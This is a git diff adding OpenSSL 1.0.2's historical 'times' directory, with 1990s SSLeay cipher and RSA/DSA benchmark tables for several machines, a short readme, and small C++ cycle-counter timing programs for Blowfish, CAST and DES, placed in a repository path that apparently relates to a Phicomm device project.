+sha1              175.30k      781.14k     1310.32k     1575.61k     1675.81k
+rc4              2070.55k     2501.47k     2556.65k     2578.34k     2584.91k
+des cbc           465.13k      536.85k      545.87k      547.86k      548.89k
+des ede3          190.05k      200.99k      202.31k      202.22k      202.75k
+idea cbc          263.44k      277.77k      282.13k      281.51k      283.15k
+rc2 cbc           448.37k      511.39k      519.54k      522.00k      521.31k
+blowfish cbc      839.98k     1097.70k     1131.16k     1145.64k     1144.67k
+rsa  512 bits   0.048s   0.005
+rsa 1024 bits   0.222s   0.006
+rsa 2048 bits   1.272s   0.042
+rsa 4096 bits   8.445s   0.149
+dsa  512 bits   0.041s   0.077
+dsa 1024 bits   0.111s   0.220
+dsa 2048 bits   0.363s   0.726
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux.t
new file mode 100644
index 0000000..dcf7615
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/hpux.t
@@ -0,0 +1,86 @@
+HP-UX A.09.05 9000/712
+
+SSLeay 0.6.6 14-Jan-1997
+built on Tue Jan 14 16:36:31 WET 1997
+options:bn(32,32) md2(int) rc4(ptr,int) des(ptr,risc1,16,long) idea(int) 
+blowfish(idx)
+C flags:cc -DB_ENDIAN -D_HPUX_SOURCE -Aa +ESlit +O2 -Wl,-a,archive
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                66.56k      184.92k      251.82k      259.86k      282.62k
+md5               615.54k     2805.92k     4764.30k     5724.21k     6084.39k
+sha               358.23k     1616.46k     2781.50k     3325.72k     3640.89k
+sha1              327.50k     1497.98k     2619.44k     3220.26k     3460.85k
+rc4              3500.47k     3890.99k     3943.81k     3883.74k     3900.02k
+des cbc           742.65k      871.66k      887.15k      891.21k      895.40k
+des ede3          302.42k      322.50k      324.46k      326.66k      326.05k
+idea cbc          664.41k      755.87k      765.61k      772.70k      773.69k
+rc2 cbc           798.78k      931.04k      947.69k      950.31k      952.04k
+blowfish cbc     1353.32k     1932.29k     2021.93k     2047.02k     2053.66k
+rsa  512 bits   0.059s
+rsa 1024 bits   0.372s
+rsa 2048 bits   2.697s
+rsa 4096 bits  20.790s
+
+SSLeay 0.6.6 14-Jan-1997
+built on Tue Jan 14 15:37:30 WET 1997
+options:bn(64,32) md2(int) rc4(ptr,int) des(ptr,risc1,16,long) idea(int) 
+blowfish(idx)
+C flags:gcc -DB_ENDIAN -O3
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                44.91k      122.57k      167.71k      183.89k      190.24k
+md5               532.50k     2316.27k     3965.72k     4740.11k     5055.06k
+sha               363.76k     1684.09k     2978.53k     3730.86k     3972.72k
+sha1              385.76k     1743.53k     2997.69k     3650.74k     3899.08k
+rc4              3178.84k     3621.31k     3672.71k     3684.01k     3571.54k
+des cbc           733.00k      844.70k      863.28k      863.72k      868.73k
+des ede3          289.99k      308.94k      310.11k      309.64k      312.08k
+idea cbc          624.07k      713.91k      724.76k      723.35k      725.13k
+rc2 cbc           704.34k      793.39k      804.25k      805.99k      782.63k
+blowfish cbc     1371.24k     1823.66k     1890.05k     1915.51k     1920.12k
+rsa  512 bits   0.030s
+rsa 1024 bits   0.156s
+rsa 2048 bits   1.113s
+rsa 4096 bits   7.480s
+
+
+HPUX B.10.01 V 9000/887 - HP92453-01 A.10.11 HP C Compiler
+SSLeay 0.5.2 - -Aa +ESlit +Oall +O4 -Wl,-a,archive
+
+HPUX A.09.04 B 9000/887
+
+ssleay 0.5.1 gcc v 2.7.0 -O3 -mpa-risc-1-1
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             53.00k      166.81k      205.66k      241.95k      242.20k
+md5            743.22k     3128.44k     6031.85k     6142.07k     7025.26k
+sha            481.30k     2008.24k     3361.31k     3985.07k     4180.74k
+sha-1          463.60k     1916.15k     3139.24k     3786.27k     3997.70k
+rc4           3708.61k     4125.16k     4547.53k     4206.21k     4390.07k
+des cfb        665.91k      705.97k      698.48k      694.25k      666.08k
+des cbc        679.80k      741.90k      769.85k      747.62k      719.47k
+des ede3       264.31k      270.22k      265.63k      273.07k      273.07k
+idea cfb       635.91k      673.40k      605.60k      699.53k      672.36k
+idea cbc       705.85k      774.63k      750.60k      715.83k      721.50k
+rsa  512 bits   0.066s
+rsa 1024 bits   0.372s
+rsa 2048 bits   2.177s
+rsa 4096 bits  16.230s
+
+HP92453-01 A.09.61 HP C Compiler
+ssleay 0.5.1 cc -Ae +ESlit +Oall -Wl,-a,archive
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             58.69k      163.30k      213.57k      230.40k      254.23k
+md5            608.60k     2596.82k     3871.43k     4684.10k     4763.88k
+sha            343.26k     1482.43k     2316.80k     2766.27k     2860.26k
+sha-1          319.15k     1324.13k     2106.03k     2527.82k     2747.95k
+rc4           2467.47k     3374.41k     3265.49k     3354.39k     3368.55k
+des cfb        812.05k      814.90k      851.20k      819.20k      854.56k
+des cbc        836.35k      994.06k      916.02k     1020.01k      988.14k
+des ede3       369.78k      389.15k      401.01k      382.94k      408.03k
+idea cfb       290.40k      298.06k      286.11k      296.92k      299.46k
+idea cbc       301.30k      297.72k      304.34k      300.10k      309.70k
+rsa  512 bits   0.350s
+rsa 1024 bits   2.635s
+rsa 2048 bits  19.930s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/p2.w95 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/p2.w95
new file mode 100644
index 0000000..82d1e55
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/p2.w95
@@ -0,0 +1,22 @@
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               235.90k      652.30k      893.36k      985.74k      985.74k
+mdc2              779.61k      816.81k      825.65k      816.01k      825.65k
+md5              2788.77k    13508.23k    24672.38k    30504.03k    33156.55k
+sha              1938.22k     8397.01k    14122.24k    16980.99k    18196.55k
+sha1             1817.29k     7832.50k    13168.93k    15738.48k    16810.84k
+rc4             15887.52k    21709.65k    22745.68k    22995.09k    22995.09k
+des cbc          4599.02k     5377.31k     5377.31k     5533.38k     5533.38k
+des ede3         1899.59k     2086.71k     2086.67k     2086.51k     2085.90k
+idea cbc         3350.08k     3934.62k     3979.42k     4017.53k     4017.53k
+rc2 cbc          1534.13k     1630.76k     1625.70k     1644.83k     1653.91k
+blowfish cbc     6678.83k     8490.49k     8701.88k     8848.74k     8886.24k
+                  sign    verify
+rsa  512 bits   0.0062s   0.0008s
+rsa 1024 bits   0.0287s   0.0009s
+rsa 2048 bits   0.1785s   0.0059s
+rsa 4096 bits   1.1300s   0.0205s
+                  sign    verify
+dsa  512 bits   0.0055s   0.0100s
+dsa 1024 bits   0.0154s   0.0299s
+dsa 2048 bits   0.0502s   0.0996s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/pent2.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/pent2.t
new file mode 100644
index 0000000..b6dc269
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/pent2.t
@@ -0,0 +1,24 @@
+pentium 2, 266mhz, Visual C++ 5.0, Windows 95
+
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               235.90k      652.30k      893.36k      985.74k      985.74k
+mdc2              779.61k      816.81k      825.65k      816.01k      825.65k
+md5              2788.77k    13508.23k    24672.38k    30504.03k    33156.55k
+sha              1938.22k     8397.01k    14122.24k    16980.99k    18196.55k
+sha1             1817.29k     7832.50k    13168.93k    15738.48k    16810.84k
+rc4             15887.52k    21709.65k    22745.68k    22995.09k    22995.09k
+des cbc          4599.02k     5377.31k     5377.31k     5533.38k     5533.38k
+des ede3         1899.59k     2086.71k     2086.67k     2086.51k     2085.90k
+idea cbc         3350.08k     3934.62k     3979.42k     4017.53k     4017.53k
+rc2 cbc          1534.13k     1630.76k     1625.70k     1644.83k     1653.91k
+blowfish cbc     6678.83k     8490.49k     8701.88k     8848.74k     8886.24k
+                  sign    verify
+rsa  512 bits   0.0062s   0.0008s
+rsa 1024 bits   0.0287s   0.0009s
+rsa 2048 bits   0.1785s   0.0059s
+rsa 4096 bits   1.1300s   0.0205s
+                  sign    verify
+dsa  512 bits   0.0055s   0.0100s
+dsa 1024 bits   0.0154s   0.0299s
+dsa 2048 bits   0.0502s   0.0996s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/readme b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/readme
new file mode 100644
index 0000000..7074f58
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/readme
@@ -0,0 +1,11 @@
+The 'times' in this directory are not all for the most recent version of
+the library and it should be noted that on some CPUs (specifically sparc
+and Alpha), the locations of files in the application after linking can
+make upto a %10 speed difference when running benchmarks on things like
+cbc mode DES.  To put it mildly this can be very anoying.
+
+About the only way to get around this would be to compile the library as one
+object file, or to 'include' the source files in a specific order.
+
+The best way to get an idea of the 'raw' DES speed is to build the 
+'speed' program in crypto/des.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.lnx
new file mode 100644
index 0000000..68df77e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.lnx
@@ -0,0 +1,25 @@
+Shared library build
+
+SSLeay 0.7.3 30-Apr-1997
+built on Tue May 13 03:43:56 EST 1997
+options:bn(64,32) md2(char) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2)
+C flags:-DTERMIOS -O3 -DL_ENDIAN -fomit-frame-pointer -m486 -Wall
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                68.95k      191.40k      258.22k      283.31k      291.21k
+md5               627.37k     3064.75k     5370.15k     6765.91k     7255.38k
+sha               323.35k     1431.32k     2417.07k     2916.69k     3102.04k
+sha1              298.08k     1318.34k     2228.82k     2694.83k     2864.47k
+rc4              3404.13k     4026.33k     4107.43k     4136.28k     4117.85k
+des cbc          1414.60k     1782.53k     1824.24k     1847.64k     1840.47k
+des ede3          588.36k      688.19k      700.33k      702.46k      704.51k
+idea cbc          582.96k      636.71k      641.54k      642.39k      642.30k
+rc2 cbc           569.34k      612.37k      617.64k      617.47k      619.86k
+blowfish cbc     2015.77k     2534.49k     2609.65k     2607.10k     2615.98k
+rsa  512 bits   0.027s   0.003
+rsa 1024 bits   0.128s   0.003
+rsa 2048 bits   0.779s   0.027
+rsa 4096 bits   5.450s   0.098
+dsa  512 bits   0.024s   0.045
+dsa 1024 bits   0.068s   0.132
+dsa 2048 bits   0.231s   0.469
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.nt
new file mode 100644
index 0000000..8e3baf6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/s586-100.nt
@@ -0,0 +1,23 @@
+SSLeay 0.7.3 30-Apr-1997
+built on Mon May 19 10:47:38 EST 1997
+options:bn(64,32) md2(char) rc4(idx,int) des(idx,cisc,4,long) idea(int) blowfish(ptr2)
+C flags not available
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                90.26k      248.57k      335.06k      366.09k      376.64k
+md5               863.95k     4205.24k     7628.78k     9582.60k    10290.25k
+sha               463.93k     2102.51k     3623.28k     4417.85k     4695.29k
+sha1              458.23k     2005.88k     3385.78k     4094.00k     4340.13k
+rc4              5843.60k     7543.71k     7790.31k     7836.89k     7791.47k
+des cbc          1583.95k     1910.67k     1960.69k     1972.12k     1946.13k
+des ede3          654.79k      722.60k      740.97k      745.82k      738.27k
+idea cbc          792.04k      876.96k      887.35k      892.63k      890.36k
+rc2 cbc           603.50k      652.38k      661.85k      662.69k      661.44k
+blowfish cbc     2379.88k     3043.76k     3153.61k     3153.61k     3134.76k
+rsa  512 bits   0.022s   0.003
+rsa 1024 bits   0.111s   0.003
+rsa 2048 bits   0.716s   0.025
+rsa 4096 bits   5.188s   0.094
+dsa  512 bits   0.020s   0.039
+dsa 1024 bits   0.062s   0.124
+dsa 2048 bits   0.221s   0.441
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sgi.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sgi.t
new file mode 100644
index 0000000..7963610
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sgi.t
@@ -0,0 +1,29 @@
+SGI Challenge R4400 200mhz IRIX 5.3 - gcc (2.6.3)
+SSLeay 0.6.1 02-Jul-1996
+built on Tue Jul  2 16:25:30 EST 1996
+options:bn(64,32) md2(char) rc4(idx,char) des(idx,long) idea(int)
+C flags:gcc -O2 -mips2 -DTERMIOS -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             96.53k      266.70k      360.09k      393.70k      405.07k
+md5            971.15k     4382.56k     7406.90k     8979.99k     9559.18k
+sha            596.86k     2832.26k     4997.30k     6277.75k     6712.89k
+sha1           578.34k     2630.16k     4632.05k     5684.34k     6083.37k
+rc4           5641.12k     6821.76k     6996.13k     7052.61k     6913.32k
+des cfb       1354.86k     1422.11k     1434.58k     1433.24k     1432.89k
+des cbc       1467.13k     1618.92k     1630.08k     1637.00k     1629.62k
+des ede3       566.13k      591.91k      596.86k      596.18k      592.54k
+idea cfb      1190.60k     1264.49k     1270.38k     1267.84k     1272.37k
+idea cbc      1271.45k     1410.37k     1422.49k     1426.46k     1421.73k
+rc2 cfb       1285.73k     1371.40k     1380.92k     1383.13k     1379.23k
+rc2 cbc       1386.61k     1542.10k     1562.49k     1572.45k     1567.93k
+rsa  512 bits   0.018s
+rsa 1024 bits   0.106s
+rsa 2048 bits   0.738s
+rsa 4096 bits   5.535s
+
+version:SSLeay 0.5.2c 15-May-1996
+rsa  512 bits   0.035s
+rsa 1024 bits   0.204s
+rsa 2048 bits   1.423s
+rsa 4096 bits  10.800s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc.t
new file mode 100644
index 0000000..1611f76
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc.t
@@ -0,0 +1,26 @@
+gcc 2.7.2
+Sparc 10 - Solaris 2.3 - 50mhz
+SSLeay 0.7.3r 20-May-1997
+built on Mon Jun  2 00:55:51 EST 1997
+options:bn(64,32) md2(int) rc4(ptr,char) des(idx,cisc,16,long) idea(int) blowfish(ptr)
+C flags:gcc -O3 -fomit-frame-pointer -mv8 -Wall
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                54.88k      154.52k      210.35k      231.08k      237.21k
+md5               550.75k     2460.49k     4116.01k     4988.74k     5159.86k
+sha               340.28k     1461.76k     2430.10k     2879.87k     2999.15k
+sha1              307.27k     1298.41k     2136.26k     2540.07k     2658.28k
+rc4              2652.21k     2805.24k     3301.63k     4003.98k     4071.18k
+des cbc           811.78k      903.93k      914.19k      921.60k      932.29k
+des ede3          328.21k      344.93k      349.64k      351.48k      345.07k
+idea cbc          685.06k      727.42k      734.41k      730.11k      739.21k
+rc2 cbc           718.59k      777.02k      781.96k      784.38k      782.60k
+blowfish cbc     1268.85k     1520.64k     1568.88k     1587.54k     1591.98k
+rsa  512 bits   0.037s   0.005
+rsa 1024 bits   0.213s   0.006
+rsa 2048 bits   1.471s   0.053
+rsa 4096 bits  11.100s   0.202
+dsa  512 bits   0.038s   0.074
+dsa 1024 bits   0.128s   0.248
+dsa 2048 bits   0.473s   0.959
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc2 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc2
new file mode 100644
index 0000000..4b0dd80
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparc2
@@ -0,0 +1,21 @@
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                14.56k       40.25k       54.95k       60.13k       62.18k
+mdc2               53.59k       57.45k       58.11k       58.21k       58.51k
+md5               176.95k      764.75k     1270.36k     1520.14k     1608.36k
+hmac(md5)          55.88k      369.70k      881.15k     1337.05k     1567.40k
+sha1               92.69k      419.75k      723.63k      878.82k      939.35k
+rc4              1247.28k     1414.09k     1434.30k     1434.34k     1441.13k
+des cbc           284.41k      318.58k      323.07k      324.09k      323.87k
+des ede3          109.99k      119.99k      121.60k      121.87k      121.66k
+idea cbc           43.06k       43.68k       43.84k       43.64k       44.07k
+rc2 cbc           278.85k      311.44k      316.50k      316.57k      317.37k
+blowfish cbc      468.89k      569.35k      581.61k      568.34k      559.54k
+cast cbc          285.84k      338.79k      345.71k      346.19k      341.09k
+                  sign    verify
+rsa  512 bits   0.4175s   0.0519s
+rsa 1024 bits   2.9325s   0.1948s
+rsa 2048 bits  22.3600s   0.7669s
+		  sign    verify
+dsa  512 bits   0.5178s   1.0300s
+dsa 1024 bits   1.8780s   3.7167s
+dsa 2048 bits   7.3500s  14.4800s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparcLX.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparcLX.t
new file mode 100644
index 0000000..2fdaed7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/sparcLX.t
@@ -0,0 +1,22 @@
+Sparc Station LX
+SSLeay 0.7.3 30-Apr-1997
+built on Thu May  1 10:44:02 EST 1997
+options:bn(64,32) md2(int) rc4(ptr,char) des(idx,cisc,16,long) idea(int) blowfish(ptr)
+C flags:gcc -O3 -fomit-frame-pointer -mv8 -Wall
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                17.60k       48.72k       66.47k       72.70k       74.72k
+md5               226.24k     1082.21k     1982.72k     2594.02k     2717.01k
+sha                71.38k      320.71k      551.08k      677.76k      720.90k
+sha1               63.08k      280.79k      473.86k      576.94k      608.94k
+rc4              1138.30k     1257.67k     1304.49k     1377.78k     1364.42k
+des cbc           265.34k      308.85k      314.28k      315.39k      317.20k
+des ede3           83.23k       93.13k       94.04k       94.50k       94.63k
+idea cbc          254.48k      274.26k      275.88k      274.68k      275.80k
+rc2 cbc           328.27k      375.39k      381.43k      381.61k      380.83k
+blowfish cbc      487.00k      498.02k      510.12k      515.41k      516.10k
+rsa  512 bits   0.093s
+rsa 1024 bits   0.537s
+rsa 2048 bits   3.823s
+rsa 4096 bits  28.650s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/usparc.t b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/usparc.t
new file mode 100644
index 0000000..2215624
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/usparc.t
@@ -0,0 +1,25 @@
+Sparc 2000? - Solaris 2.5.1 - 167mhz Ultra sparc
+
+SSLeay 0.7.3r 20-May-1997
+built on Mon Jun  2 02:25:48 EST 1997
+options:bn(64,32) md2(int) rc4(ptr,char) des(ptr,risc1,16,long) idea(int) blowfish(ptr)
+C flags:cc cc -xtarget=ultra -xarch=v8plus -Xa -xO5 -Xa -DB_ENDIAN
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               135.23k      389.87k      536.66k      591.87k      603.48k
+md5              1534.38k     6160.41k     9842.69k    11446.95k    11993.09k
+sha              1178.30k     5020.74k     8532.22k    10275.50k    11010.05k
+sha1             1114.22k     4703.94k     7703.81k     9236.14k     9756.67k
+rc4             10818.03k    13327.57k    13711.10k    13810.69k    13836.29k
+des cbc          3052.44k     3320.02k     3356.25k     3369.98k     3295.91k
+des ede3         1310.32k     1359.98k     1367.47k     1362.94k     1362.60k
+idea cbc         1749.52k     1833.13k     1844.74k     1848.32k     1848.66k
+rc2 cbc          1950.25k     2053.23k     2064.21k     2072.58k     2072.58k
+blowfish cbc     4927.16k     5659.75k     5762.73k     5797.55k     5805.40k
+rsa  512 bits   0.021s   0.003
+rsa 1024 bits   0.126s   0.003
+rsa 2048 bits   0.888s   0.032
+rsa 4096 bits   6.770s   0.122
+dsa  512 bits   0.022s   0.043
+dsa 1024 bits   0.076s   0.151
+dsa 2048 bits   0.286s   0.574
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/bfs.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/bfs.cpp
new file mode 100644
index 0000000..d74c457
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/bfs.cpp
@@ -0,0 +1,67 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/blowfish.h>
+
+void main(int argc,char *argv[])
+	{
+	BF_KEY key;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			BF_encrypt(&data[0],&key);
+			GetTSC(s1);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			GetTSC(e1);
+			GetTSC(s2);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			BF_encrypt(&data[0],&key);
+			GetTSC(e2);
+			BF_encrypt(&data[0],&key);
+			}
+
+		printf("blowfish %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/casts.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/casts.cpp
new file mode 100644
index 0000000..7661191
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/casts.cpp
@@ -0,0 +1,67 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/cast.h>
+
+void main(int argc,char *argv[])
+	{
+	CAST_KEY key;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			CAST_encrypt(&data[0],&key);
+			GetTSC(s1);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			GetTSC(e1);
+			GetTSC(s2);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			CAST_encrypt(&data[0],&key);
+			GetTSC(e2);
+			CAST_encrypt(&data[0],&key);
+			}
+
+		printf("cast %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/des3s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/des3s.cpp
new file mode 100644
index 0000000..cd2b112
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/des3s.cpp
@@ -0,0 +1,67 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/des.h>
+
+void main(int argc,char *argv[])
+	{
+	des_key_schedule key1,key2,key3;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			des_encrypt3(&data[0],key1,key2,key3);
+			GetTSC(s1);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			GetTSC(e1);
+			GetTSC(s2);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			des_encrypt3(&data[0],key1,key2,key3);
+			GetTSC(e2);
+			des_encrypt3(&data[0],key1,key2,key3);
+			}
+
+		printf("des3 %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/dess.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/dess.cpp
new file mode 100644
index 0000000..753e67a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/x86/dess.cpp
@@ -0,0 +1,67 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/des.h>
+
+void main(int argc,char *argv[])
+	{
+	des_key_schedule key;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			des_encrypt(&data[0],key,1);
+			GetTSC(s1);
+			des_encrypt(&data[0],key,1);
+			des_encrypt(&data[0],key,1);
+			des_encrypt(&data[0],key,1);
+			GetTSC(e1);
+			GetTSC(s2);
+			des_encrypt(&data[0],key,1);
+			des_encrypt(&data[0],key,1);
+			des_encrypt(&data[0],key,1);
+			des_encrypt(&data[0],key,1);
+			GetTSC(e2);
+			des_encrypt(&data[0],key,1);
+			}
+
+		printf("des %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
